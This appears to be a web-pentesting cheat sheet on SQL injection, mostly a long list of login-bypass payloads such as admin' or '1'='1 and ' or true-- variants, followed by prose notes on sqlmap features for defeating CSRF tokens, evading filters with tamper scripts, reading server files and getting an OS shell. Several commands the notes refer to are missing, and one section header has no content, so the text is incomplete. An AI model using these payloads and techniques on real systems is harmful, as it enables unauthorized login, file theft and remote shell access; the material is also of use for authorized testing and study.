SQL Injection
Sql Injection Basic Payloads
admin' or '1'='1
admin')-- -
'OR 1=1' OR 1
' or 1=1 limit 1 -- -+
'="or'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
'-||0'
"-||0"
"-"
" "
"&"
"^"
"*"
'--'
"--"
'--' / "--"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 2 like 2
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' -- -
admin' #
admin'/*
admin' or '2' LIKE '1
admin' or 2 LIKE 2--
admin' or 2 LIKE 2#
admin') or 2 LIKE 2#
admin') or 2 LIKE 2--
admin') or ('2' LIKE '2
admin') or ('2' LIKE '2'#
admin') or ('2' LIKE '2'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*Advanced Blind SQL Payloads (XOR)
SQLMAP Advanced Usage
CSRF-TOKEN Bypass with Sqlmap
If there is csrf-token validation and the request is being invalidated after sending to the server for the first time then we can use the following command, in the below command i have a token being sent in the post data so i will pass the token parameter to the sqlmap and the i will be able to get the sql injection otherwise my requests will be invalidated after the first request

and we got a successfull sql injection here.

Randomize any Parameter using Sqlmap
If there is a case where we need to change a value after every request we can use the randomize flag for that
Because if i will not randomize the uid parameter my request will fail

SQLMAP Tamper Scripts to Bypass Filters
If <> signs are blocked then you can use tamper scripts, we can use --tamper=between flag and it will not use < > signs any more


we can see some more tamper scripts as well by doing

File Read using Sqlmap
we can use the --file-read flag
OS-Shell using SqlMap
we can use --os-shell to get a reverse shell
Last updated